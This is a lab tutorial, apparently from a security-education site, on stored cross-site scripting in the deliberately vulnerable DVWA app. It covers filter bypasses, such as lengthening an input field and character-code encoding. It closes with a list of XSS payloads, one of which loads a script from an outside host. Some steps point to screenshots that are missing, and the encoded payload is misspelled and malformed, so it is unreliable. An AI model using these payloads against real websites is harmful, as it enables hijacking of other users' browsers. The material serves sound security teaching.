Stored XSS in DVWA
Refer to the XSS - Cross Site Scripting guide, where I 'm explaining what XSS is and the types of XSS.
The difference between the Reflected XSS and the Stored XSS is that the Stored XSS is, as implied by it's name is stored in the site, so anyone who gets into the site will see your XSS in their browser.
Power on the Metasploitable machine, and get the machine IP.
in the Kali machine open up browser and go to the metasploit IP
DVWA >> DVWA Security >> Low >> submit
DVWA >> “XSS stored"
Add your name and a message to see how the website works.
Now if you will go to the same URL from a different computer you will see the same message you typed.
So now, let’s inject the payload in one machine / pc.
Once you visit the same website in a different machine, you will get your XSS message.
Your Java script is now stored in the website = stored xss.
In the second browser you will see:
Next stage is to change the security level to medium.
But before you do that, you need to reset the DB, since you already have stored xss in there:
You need to think of another way to bypass the defenses of the website.
How about the "Name" field?
If you try to inject your script to the "Name" field you will see that you can’t set more than 10 characters.
In order to bypass that, go to the source code and change the 10 to 50 or more and then try again, like so:
Change:
Inject:
The result is:
Some website will filter quotes or double quotes so we can try to run the payload with character code via website like this
To make sure you bypass any filter, you need to change the "alert" of the script as well:
<Script>alert(Stirn.fromCharCode(120, 115, 115, 50, 10))<ScRIpT>
Now if you visit the website from a different machine, you will see the payload you injected, in our example "xss2".
Hope you find this information useful.
There are many more script injections on the web for you to explore, sech as:
<IMG onmouseover="alert('xxs')">
<IMG SRC=# onmouseover="alert('xxs')">
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<BODY BACKGROUND="javascript:alert('XSS')">
All the guides, tips, and tricks on this web site are for education purpose only, the website owner is not accountable for any use of this information